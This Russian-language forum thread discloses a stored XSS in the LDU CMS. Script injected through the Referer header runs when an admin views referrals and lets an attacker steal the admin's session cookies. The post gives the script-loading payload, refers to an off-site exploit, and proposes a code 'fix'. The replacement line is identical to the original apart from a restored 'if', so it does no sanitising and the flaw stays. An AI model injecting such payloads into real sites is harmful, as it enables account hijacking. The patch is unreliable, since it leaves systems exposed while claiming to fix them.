![]() |
Ldu Xss
В CMS системе LDU - Land Down Under мною была найдена активная XSS. Которая позволяет получить куки админа который просматривает рефералы.
Тоесть если взломщик пощлет поддельный запрос с полем Referer равным например Код:
<script src=path to javascript></script>Также я написал сплойт который посылает поддельный запрос взять его можно здесь. Чтобы устранить уязвимость откройте файл system\common.php найдите в нём вот эти строки Код:
f (@!eregi($cfg['mainurl'], $sys['referer']) && @!eregi($cfg['hostip'],$sys['referer']) && @!eregi(str_replace('www.','',$cfg['mainurl']), $sys['referer']) && !empty($sys['referer']))и замените на вот это Код:
if (@!eregi($cfg['mainurl'], $sys['referer']) && @!eregi($cfg['hostip'],$sys['referer']) && @!eregi(str_replace('www.','',$cfg['mainurl']), $sys['referer']) && !empty($sys['referer'])) |
Поправь ссылку пожайлуста
|
|
esteam.net.ru - временно неработает когда нормально заработает неизвестно(не от меня зависит)
=== а ссылку поправил. |
| Время: 19:26 |